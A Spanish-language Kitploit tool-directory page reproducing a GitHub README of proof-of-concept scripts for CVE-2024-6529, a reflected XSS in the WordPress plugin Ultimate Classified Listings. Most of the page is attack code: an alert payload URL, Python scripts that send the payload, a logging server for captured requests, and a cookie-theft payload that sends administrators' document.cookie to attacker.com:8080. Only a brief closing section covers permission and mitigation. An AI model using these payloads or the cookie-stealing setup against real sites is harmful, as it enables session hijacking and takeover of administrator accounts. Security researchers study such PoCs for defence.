Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-6529 — Pruebas de concepto que demuestran XSS reflejado en el plugin de WordPress Ultimate Classified Listings y el robo de cookies de administrador mediante payloads diseñados y un servidor de registro. | Kitploit
Herramientas/GitHubGitHub/abdurahmon3236/cve-2024-6529
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPhishingPruebas de PenetraciónIngeniería Social
GitHubabdurahmon3236/cve-2024-6529

CVE-2024-6529

Pruebas de concepto que demuestran XSS reflejado en el plugin de WordPress Ultimate Classified Listings y el robo de cookies de administrador mediante payloads diseñados y un servidor de registro.

Ver Repositorio
6hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Prueba de Concepto (PoC) para Vulnerabilidades en Plugins de WordPress

Este repositorio contiene scripts de Prueba de Concepto (PoC) para varias vulnerabilidades descubiertas en diferentes plugins de WordPress. Estos scripts demuestran cómo los atacantes pueden explotar estas vulnerabilidades para realizar acciones maliciosas.

Tabla de Contenidos

  • Vulnerabilidades Cubiertas
  • Configuración y Uso
    • XSS Reflejado en Ultimate Classified Listings Plugin
    • Robo de Cookies Usando XSS
  • Consideraciones Importantes

Vulnerabilidades Cubiertas

  1. Cross-Site Scripting (XSS) Reflejado en Ultimate Classified Listings Plugin

    • Una vulnerabilidad en el plugin Ultimate Classified Listings de WordPress anterior a la versión 1.4 permite a los atacantes ejecutar JavaScript arbitrario inyectando scripts maliciosos a través de parámetros no saneados.
  2. Robo de Cookies Usando XSS

    • Demuestra cómo un atacante puede explotar la vulnerabilidad XSS reflejado para robar cookies de usuarios con altos privilegios, como administradores, enviando las cookies a un servidor malicioso.

Configuración y Uso

XSS Reflejado en Ultimate Classified Listings Plugin

Este PoC demuestra cómo explotar la vulnerabilidad XSS reflejado en el plugin Ultimate Classified Listings.

  1. Identificar el Parámetro Vulnerable:

    • Suponga que el parámetro vulnerable es search en la URL http://example.com/classifieds.
  2. Crear una URL Maliciosa:

    • La URL maliciosa puede incluir un payload para ejecutar un diálogo de alerta:
      root@kitploit:~
      http://example.com/classifieds?search=<script>alert('XSS')</script>
      
  3. Ejecutar el Script de PoC:

    • Guarde el siguiente script como xss_poc.py y ejecútelo.
    root@kitploit:~
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Change this to the target site's URL
    payload = "<script>alert('XSS')</script>"  # XSS payload
    
    def trigger_xss():
        # Construct the malicious URL
        malicious_url = f"{target_url}?search={payload}"
    
        # Send a GET request to the malicious URL
        response = requests.get(malicious_url)
    
        # Check if the payload is reflected in the response
        if payload in response.text:
            print("[+] XSS payload reflected in the response.")
            print("[+] Malicious URL:", malicious_url)
        else:
            print("[-] XSS payload not reflected in the response.")
    
    if __name__ == "__main__":
        trigger_xss()
    

Robo de Cookies Usando XSS

Este PoC demuestra cómo un atacante puede explotar la vulnerabilidad XSS reflejado para robar cookies de usuarios con altos privilegios.

  1. Configurar un Servidor Malicioso:

    • Guarde el siguiente script como malicious_server.py y ejecútelo para iniciar un servidor que registre las solicitudes entrantes (incluyendo cookies).
    root@kitploit:~
    from http.server import BaseHTTPRequestHandler, HTTPServer
    import logging
    
    class RequestHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            logging.info(f"Received request: {self.headers}")
            self.send_response(200)
            self.end_headers()
    
    def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
        logging.basicConfig(filename='server.log', level=logging.INFO)
        server_address = ('', port)
        httpd = server_class(server_address, handler_class)
        logging.info(f'Starting server on port {port}...')
        httpd.serve_forever()
    
    if __name__ == "__main__":
        run()
    
  2. Crear un Payload para Robar Cookies:

    • Cree un payload que envíe las cookies del administrador al servidor malicioso:
      root@kitploit:~
      http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
      
  3. Ejecutar el Script de PoC:

    • Guarde el siguiente script como steal_cookies_poc.py y ejecútelo.
    root@kitploit:~
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Change this to the target site's URL
    attacker_server = "http://attacker.com:8080"  # Change this to your malicious server's URL
    payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>"
    
    def trigger_xss():
        # Construct the malicious URL
        malicious_url = f"{target_url}?search={payload}"
    
        # Send a GET request to the malicious URL
        response = requests.get(malicious_url)
    
        # Check if the payload is reflected in the response
        if payload in response.text:
            print("[+] XSS payload reflected in the response.")
            print("[+] Malicious URL:", malicious_url)
        else:
            print("[-] XSS payload not reflected in the response.")
    
    if __name__ == "__main__":
        trigger_xss()
    

Consideraciones Importantes

  • Permisos: Asegúrese de tener permiso explícito para probar estas vulnerabilidades en el sitio objetivo. El acceso no autorizado es ilegal y poco ético.
  • Entorno de Pruebas: Realice estas pruebas en un entorno controlado para evitar afectar los sistemas de producción.
  • Mitigación: Actualice el plugin Ultimate Classified Listings a la versión 1.4 o posterior. Siempre sanitice y escape las entradas de usuario antes de incluirlas en la salida.

Estos PoCs demuestran cómo un atacante podría explotar vulnerabilidades en plugins de WordPress para realizar acciones maliciosas. Siempre mantenga su software actualizado y siga las mejores prácticas de seguridad para prevenir tales vulnerabilidades.

Descargar herramienta